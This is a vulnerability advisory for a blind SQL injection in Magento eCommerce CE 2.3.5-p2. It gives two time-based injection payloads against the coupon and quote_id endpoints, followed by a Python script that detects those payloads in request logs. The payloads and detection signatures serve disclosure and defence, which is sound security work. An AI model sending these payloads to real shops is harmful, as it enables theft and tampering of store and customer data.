Vendor: Magento eCommerce CE
By: Aydin Naserifard
CVSS: 8.8 (HIGH)
Vulnerability type: Blind SQL Injection
CWE: 89
Product Name: Magento eCommerce CE
Affected Version From: 2.3.5-p2
Affected Version To: 2.3.5-p2
Patch Exists: YES
Related CWE:
CPE: cpe:a:magento:magento_ecommerce_ce:2.3.5-p2
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2021

Magento eCommerce CE v2.3.5-p2 – Blind SQLi

Magento eCommerce CE v2.3.5-p2 is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries via the quote_id parameter in the POST /cargo/index/validateqty request and the PUT /rest/default/V1/carts/mine/coupons/aydin request. This can allow an attacker to extract data from the database, modify data, execute administration operations, and potentially compromise the system.

Mitigation:

Upgrade from Magento eCommerce CE v2.3.5-p2 to the latest release.

Exploit-DB raw data:

# Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi
# Date: 2021-4-21
# Exploit Author: Aydin Naserifard
# Vendor Homepage: https://www.adobe.com/
# Software Link:  https://github.com/magento/magento2/releases/tag/2.3.5-p2
# Version: [2.3.5-p2]
# Tested on: [2.3.5-p2]

POC:

1)PUT
/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23

2)POST /cargo/index/validateqty
[quote_id parameter]
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23
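Detection logic for the two requests the advisory names, as an added example (not code from the advisory or from Magento): it URL-decodes the coupon-code path segment and the quote_id form field, flags the time-based blind SQLi signatures described above (sleep() inside if(), character probing of database(), a trailing comment marker) and applies an allow-list for what a legitimate value looks like. The signature names, the allow-list policy and the SAMPLE_REQUESTS log are constructed/assumed for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Signatures of the time-based blind SQLi in the advisory: sleep() inside if(),
# database() probing with substring()/ascii(), trailing comment marker (decoded values)
SIGNATURES = {
    "sleep_call": re.compile(r"\bsleep\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
    "conditional_sleep": re.compile(r"\bif\s*\(.*\bsleep\s*\(", re.I),
    "schema_probe": re.compile(r"\b(substring|ascii)\s*\(.*\bdatabase\s*\(\s*\)", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)\s*$"),
}
# Endpoints/parameters the advisory names, plus an allow-list for legitimate values
# (assumed policy, not Magento's own: numeric quote ids, plain alphanumeric coupon codes)
WATCHED = {
    ("PUT", "/rest/default/V1/carts/mine/coupons/"): ("coupon_code", re.compile(r"^[A-Za-z0-9_-]{1,64}$")),
    ("POST", "/cargo/index/validateqty"): ("quote_id", re.compile(r"^\d{1,20}$")),
}

def extract_value(method, path, body):
    """Return (label, decoded value, allow-list) for a watched request, else None."""
    url = urlsplit(path)
    for (m, prefix), (label, allowed) in WATCHED.items():
        if method != m or not url.path.startswith(prefix):
            continue
        if label == "coupon_code":  # the coupon code is the trailing path segment
            return label, unquote_plus(url.path[len(prefix):]), allowed
        values = parse_qs(body, keep_blank_values=True).get(label)  # form field in the body
        return (label, values[0], allowed) if values else None
    return None

def classify(method, path, body=""):
    """Return the findings for one request; an empty list means nothing suspicious."""
    found = extract_value(method, path, body)
    if found is None:
        return []
    label, value, allowed = found
    findings = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if not allowed.match(value):
        findings.append(f"{label}_outside_allowlist")
    return findings

# Constructed sample request log (method, path, body), not real traffic; entries 2 and 3
# carry the payloads quoted in the advisory so the rules can be checked against them.
SAMPLE_REQUESTS = [
    ("PUT", "/rest/default/V1/carts/mine/coupons/SPRING2021", ""),
    ("POST", "/cargo/index/validateqty", "quote_id=100499"),
    ("PUT", "/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23", ""),
    ("POST", "/cargo/index/validateqty", 'quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23'),
]

def scan(requests=SAMPLE_REQUESTS):  # {index: findings} for every request that triggered a rule
    return {i: f for i, (m, p, b) in enumerate(requests) if (f := classify(m, p, b))}
```

The allow-list check is the same validation a fix would apply server-side; a hit on it alone (without the SQL signatures) is worth logging, since a blind injection only needs the quote delimiter to escape the query.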